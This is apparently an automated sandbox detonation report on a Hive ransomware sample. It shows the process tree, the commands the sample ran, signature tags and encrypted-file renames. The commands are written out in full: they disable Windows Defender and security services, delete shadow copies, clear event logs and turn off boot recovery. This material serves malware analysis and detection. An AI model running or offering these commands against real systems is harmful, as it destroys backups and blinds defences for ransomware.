PID 1624 wrote to memory of 872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1624 wrote to memory of 872 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 612 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 1972 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1964 wrote to memory of 1260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 1688 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\net.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2020 wrote to memory of 1712 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1136 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 540 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe
PID 1688 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\system32\sc.exe

Processes

C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

N/A

Files

memory/380-55-0x0000000000000000-mapping.dmp

memory/680-56-0x0000000000000000-mapping.dmp

memory/784-57-0x0000000000000000-mapping.dmp

memory/1704-58-0x0000000000000000-mapping.dmp

memory/620-59-0x0000000000000000-mapping.dmp

memory/572-60-0x0000000000000000-mapping.dmp

memory/1624-61-0x0000000000000000-mapping.dmp

memory/872-62-0x0000000000000000-mapping.dmp

memory/2008-63-0x0000000000000000-mapping.dmp

memory/612-64-0x0000000000000000-mapping.dmp

memory/2016-65-0x0000000000000000-mapping.dmp

memory/1972-66-0x0000000000000000-mapping.dmp

memory/1964-67-0x0000000000000000-mapping.dmp

memory/1260-68-0x0000000000000000-mapping.dmp

memory/2020-69-0x0000000000000000-mapping.dmp

memory/1712-70-0x0000000000000000-mapping.dmp

memory/1136-71-0x0000000000000000-mapping.dmp

memory/1616-72-0x0000000000000000-mapping.dmp

memory/1700-73-0x0000000000000000-mapping.dmp

memory/540-74-0x0000000000000000-mapping.dmp

memory/1788-75-0x0000000000000000-mapping.dmp

memory/1924-76-0x0000000000000000-mapping.dmp

memory/2044-77-0x0000000000000000-mapping.dmp

memory/1768-78-0x0000000000000000-mapping.dmp

memory/1652-79-0x0000000000000000-mapping.dmp

memory/1516-80-0x0000000000000000-mapping.dmp

memory/1604-81-0x0000000000000000-mapping.dmp

memory/592-82-0x0000000000000000-mapping.dmp

memory/1484-83-0x0000000000000000-mapping.dmp

memory/780-84-0x0000000000000000-mapping.dmp

memory/1948-85-0x0000000000000000-mapping.dmp

memory/1540-86-0x0000000000000000-mapping.dmp

memory/1988-87-0x0000000000000000-mapping.dmp

memory/1584-88-0x0000000000000000-mapping.dmp

memory/1560-89-0x0000000000000000-mapping.dmp

memory/892-90-0x0000000000000000-mapping.dmp

memory/1716-91-0x0000000000000000-mapping.dmp

memory/1744-92-0x0000000000000000-mapping.dmp

memory/1472-93-0x0000000000000000-mapping.dmp

memory/912-94-0x0000000000000000-mapping.dmp

memory/1748-95-0x0000000000000000-mapping.dmp

memory/596-96-0x0000000000000000-mapping.dmp

memory/1704-97-0x0000000000000000-mapping.dmp

memory/696-98-0x0000000000000000-mapping.dmp

memory/964-99-0x0000000000000000-mapping.dmp

memory/1588-100-0x0000000000000000-mapping.dmp

memory/1464-101-0x0000000000000000-mapping.dmp

memory/1384-102-0x0000000000000000-mapping.dmp

memory/1764-103-0x0000000000000000-mapping.dmp

memory/1456-104-0x0000000000000000-mapping.dmp

memory/1752-105-0x0000000000000000-mapping.dmp

memory/580-106-0x0000000000000000-mapping.dmp

memory/1064-107-0x0000000000000000-mapping.dmp

memory/1708-108-0x0000000000000000-mapping.dmp

memory/936-109-0x0000000000000000-mapping.dmp

memory/1780-110-0x0000000000000000-mapping.dmp

memory/1648-111-0x0000000000000000-mapping.dmp

memory/268-112-0x0000000000000000-mapping.dmp

memory/1260-113-0x0000000000000000-mapping.dmp

memory/1260-114-0x000007FEFBAE1000-0x000007FEFBAE3000-memory.dmp

memory/1932-115-0x0000000000000000-mapping.dmp

memory/1580-117-0x0000000000000000-mapping.dmp

memory/572-119-0x0000000000000000-mapping.dmp

memory/280-120-0x0000000000000000-mapping.dmp

memory/2060-121-0x0000000000000000-mapping.dmp

memory/2156-123-0x000007FEF2FD0000-0x000007FEF3B2D000-memory.dmp

memory/2156-124-0x0000000002460000-0x0000000002462000-memory.dmp

memory/2156-125-0x0000000002462000-0x0000000002464000-memory.dmp

memory/2156-126-0x0000000002464000-0x0000000002467000-memory.dmp

memory/2156-127-0x000000001B760000-0x000000001BA5F000-memory.dmp

memory/2156-128-0x000000000246B000-0x000000000248A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5320851668c91e6c29a32dd7e6eaff3d
SHA1 b4aeed87a44ab583c09e2f8ddc526061be64a915
SHA256 84012d4d2718c4739d9d8e44b6c7e4d1bfd77cba733270399487a24b6908e54f
SHA512 18a91a75f685b4299ad75a10d534cca20ae096a1dcdc005afa50d238671cec95dea3fc610589e24dba7a7e91bd848ba6830f855caf7208418faadf2626651fab

memory/2248-131-0x000007FEF2630000-0x000007FEF318D000-memory.dmp

memory/2248-132-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

memory/2248-136-0x000000000235B000-0x000000000237A000-memory.dmp

memory/2248-135-0x0000000002354000-0x0000000002357000-memory.dmp

memory/2248-134-0x0000000002352000-0x0000000002354000-memory.dmp

memory/2248-133-0x0000000002350000-0x0000000002352000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-13 13:15

Reported

2022-01-13 13:20

Platform

win10-en-20211208

Max time kernel

289s

Max time network

130s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\UseWait.crw => C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\BackupSuspend.png => C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\CheckpointComplete.crw => C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\CheckpointComplete.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PIyDs6Kn1yQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\OptimizeProtect.crw => C:\Users\Admin\Pictures\OptimizeProtect.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_nGFNE4P9yY00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\UseWait.crw.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UtXleI817LA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File renamed C:\Users\Admin\Pictures\AddRename.tif => C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\AddRename.tif.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_mT6kfWRqNVs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Users\Admin\Pictures\BackupSuspend.png.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_BK38JAIPPYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\REFSAN.TTF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Y1GsQV_cY6E0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\MusicStoreLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\models\de-DE.PhoneNumber.model C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusMSDNR_Retail-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_MgKNg1AaXwo0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_QgIUCkSihqU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailMediumTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_K_rMK21o79s0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_oiENgAPckLA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LAYERS\LAYERS.INF.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5fCUf-ud1rw0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\Fonts\PplMDL2.1.69.ttf C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ppd.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_WJSZIzruWLc0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.StarClub\Assets\Stripes\NewCollection.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
